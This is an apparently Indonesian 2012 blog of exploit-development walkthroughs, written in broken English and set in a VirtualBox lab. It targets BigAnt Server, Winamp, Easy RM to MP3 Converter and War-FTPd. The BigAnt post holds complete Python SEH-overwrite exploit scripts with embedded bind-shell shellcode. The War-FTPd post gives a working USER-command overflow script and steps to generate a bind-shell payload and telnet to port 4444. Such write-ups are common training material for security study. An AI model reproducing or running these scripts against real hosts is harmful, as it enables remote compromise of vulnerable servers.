Jumat, 28 September 2012

Exploit BigAnt Server

1. install BigAnt and ollydbg on windows in visualbox
2. make file, author make file name for fuzzer with "bigant.py", its content

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "+ "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


3. running BigAnt then ollydbg, run in ollydbg, running on the backtrack ,do fuzzer .
 
and this result for SEH chain
 the, press Shift + F9 for to direct Data in SEH Chain to Memory.
 and the, how know the data buffer in memory? right click for row stack  choose file dump 

 




4. Finding  address " POP, POP retn"
copy file vbajet32.dll from windows and paste in backtrak on folder "tmp"

further, clikc view-execute model-search for - sequence of command, 


and will appear.
after find , will find appear
5. Search offset for overwrite SEH
edit file "bigantfuzzer.py" become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+="*************"+"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

 nb = ***** (result make create pattern offset)
 then, running bigant and ollydbg , and make fuzzing, this result
value 966 be required for can to trigger SEH Handler.

 6. Edit file "BigAntFuzzer.py" wanna be

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+="\xCC\xCC\xCC\xCC" 
buffer+="\x41\x41\x41\x41" 
buffer+="\x90" * (2504-len(buffer)) 
buffer+=""
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

running BigAnt adn ollydbg , finish running  cek SEH Chain and this result
press shift + F9 and this result

under, this picture result file dump

 

 7. Make ShellCode
this result there is nothing wrong "Bad Carachter"

cek bad caracher,
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+="\xCC\xCC\xCC\xCC" 
buffer+="\x41\x41\x41\x41" 
buffer+="\x90" * (2504-len(buffer)) 
buffer+="***********"  #row 1 in result generate payload
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

cek result bad character this way ..
running bigant and ollydbg, and make a fuzzing, if result in SEH Chain not "vbajet332.dll" this wrong otherwise. if not wrong edit file "bigantfuzzer.py"  and Add a script generates results.. this example
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 16
buffer+= "\xbe\x1f\x10\xd7\xf0\x29\xc9\xb1\x51\xdb\xc1\xd9\x74\x24\xf4\x5a"
buffer+= "\x31\x72\x0e\x83\xea\xfc\x03\x6d\x1a\x35\x05\x6d\x70\x52\xab\x65"
buffer+="\x7c\x5b\xcb\x8a\x1f\x2f\x58\x50\xc4\xa4\xe4\xa4\x8f\xc7\xe3\xac"
buffer+="\x8e\xd8\x67\x03\x89\xad\x27\xbb\xa8\x5a\x9e\x30\x9e\x17\x21\xa8"
buffer+="\xee\xe7\xba\x98\x95\x28\xc8\xe7\x54\x62\x3c\xe6\x94\x98\xcb\xd3"
buffer+="\x4c\x7b\x1c\x56\x88\x08\x03\xbc\x53\xe4\xda\x37\x5f\xb1\xa9\x18"
buffer+="\x7c\x44\x45\xa5\x50\xcd\x10\xc5\x8c\xcd\x43\xd6\xfc\x36\xe7\x53"
buffer+="\xbd\xf8\x63\x23\x4e\x72\x03\xbf\xe3\x0f\xa4\xb7\xa5\x67\xab\x89"
buffer+="\x57\x94\xe3\xea\xbe\x02\x57\x72\x57\xf8\x65\x12\xd0\x8d\xbb\xbd"
buffer+="\x4a\x8d\x6c\x29\xb8\x9c\x71\x92\x6e\xa0\x5c\xbb\x07\xbb\x07\xc2"
buffer+="\xf5\x4c\xca\x91\x6f\x4f\x35\xc9\x18\x96\xc0\x1c\x75\x7f\x2c\x08"
buffer+="\xd5\xd3\x81\xe7\x89\x90\x76\x44\x7d\xe8\xa9\x2c\xe9\x07\x16\xd6"
buffer+="\xba\xae\x47\x83\x55\x15\x9d\xdb\x62\x02\x5d\xcd\x07\xbd\xf0\xa4"
buffer+="\x28\x6d\x9a\xe2\x7a\xa0\xb2\xbd\x7b\x6b\x17\x14\x7b\x44\xf0\x73"
buffer+="\xca\xe3\x48\x2c\x32\x3d\x1a\x86\x98\x97\x64\xf6\xb2\x70\x7c\x8f"
buffer+="\x72\xf9\xd5\x90\xad\xaf\x26\xbe\x34\x3a\xbd\x58\xd1\xd9\x50\x2d"
buffer+="\xc4\x74\xfb\x74\x2e\x45\x72\x61\x5a\x11\x0c\x8f\xaa\x59\xfd\xe5"
buffer+="\x33\x1b\x2f\x07\x89\xb0\xbc\x7a\x74\xf1\x69\x2f\x22\x69\x1c\xd1"
buffer+="\x86\x7c\x1f\x58\xad\x7f\x09\xf9\x7a\xd2\xe7\xac\xd5\xb8\x06\x1f"
buffer+="\x87\x69\x58\x60\xf7\xfa\xf7\x47\xfd\x34\x54\x88\x28\xa2\xa4\x89"
buffer+="\xe2\xcc\x8b\xfe\x5a\xcf\xaf\xc4\x01\xd0\x66\x96\x36\xfe\xef\x68"
buffer+="\x11\x1d\x9c\xc7\x5e\x34\x9c\x37"
buffer+= "\x90" * (2054-len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

 8. at the last, running bigant, make fuzzing  and the do telnet
Diposting oleh di Tidak ada komentar:

Rabu, 26 September 2012

Make Crash Application Winamp




Step :

1.      You make script with file name  “fuzzerwinamp.py”

2.      type script same example under it

3.      running file “fuzzerwinamp.py”

4.      after running , copy file and your paste in windows on VirtualBox in folder “C :\Program Files\winamp\Skins\Big Bento”

5.      running winamp which after install, clik right on toolbar winamp , choose skin-click big bento


6.      will appear warning crash winamp
Diposting oleh di Tidak ada komentar:

Senin, 24 September 2012

Fuzzing EasyRMtoMP3Converter


1 instal EasyRMtoMP3Converter on your windows on virtual box
2. make script fuzzing with name "fuzzereasy.py"
 


3. after make a script your test on ollydbg in virtualbox . and then can value register EIP

 

4. make a pattern offset 

 5. combination result pattern offset in a script fuzzereasy.py, and then execution in olldbg.


6. and then your make will be into save value register EIP. and then will apper value register EIP form of type DEADBEEF on ollydbg.

7. further, finding "JMP ESP", step : view - search for - command - type "JMP ESP", after meet to JMP ESP. combination woth fuzzereasy.py

8. open "msfweb"  

open
browser and type "127.0.0.1:55555" your choose payload and click windows bind shell. type procces, Restricted Characters "0x00 0x0a 0x0d 0x04 0x40" and selected endcoder "shinkataGanai" and the click button Generate Payload.
 

this result generate payload
 combain result generate payload and file "fuzzereasy.py"
this last result 


Diposting oleh di Tidak ada komentar:

Senin, 17 September 2012

Buffer Overflow

1.  in here i make software war-ftpd and ollydbg and windows in virtual box
2.  type ping "ip-target " and type nc "ip target"
3. running war-ftpd and ollydbg on virtual box

4. for result data more then 1000 byte, running the command
5. result command above
6. running war-ftpd, and then running ollydbg, then you must exsecusion file fuzzer.py in terminal, if ollydbg crash the succsesfully
and can Register EIP
7. to run this application simply input the value of ESP and EIP
8. place the payload into the stack,
 #!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 -len(buffer))
s.connect (('192.168.56.101',21))
data=s.recv(1204)
print ("Sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r \n')
data = s.recv (1204)
s.send ('PASS PASSWORD'+'\r \n')
s.close()
print("Finish")
 and this is the result
9. for finding JMP ESP, click view choose sub menu executable, and this result


and then find comannd type "JMP ESP", 
10. result customization with JMP ESP address
  11. open browser, type "127.0.0.1:55555


 choose payloads, and search type payloads "windows shell bind tcp"
the contetns in configuration, and click " Generate payloads"
is the results the "generate payloads"


12. open terminal again, copy results "generate payload "

save and exit

13.  open application war-ftpd, made to online.. after online, open terminal running fuzzer.py, if succesfully, running telnet type "  telnet 192.168.56.101 4444"
Congratulation !!!





Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)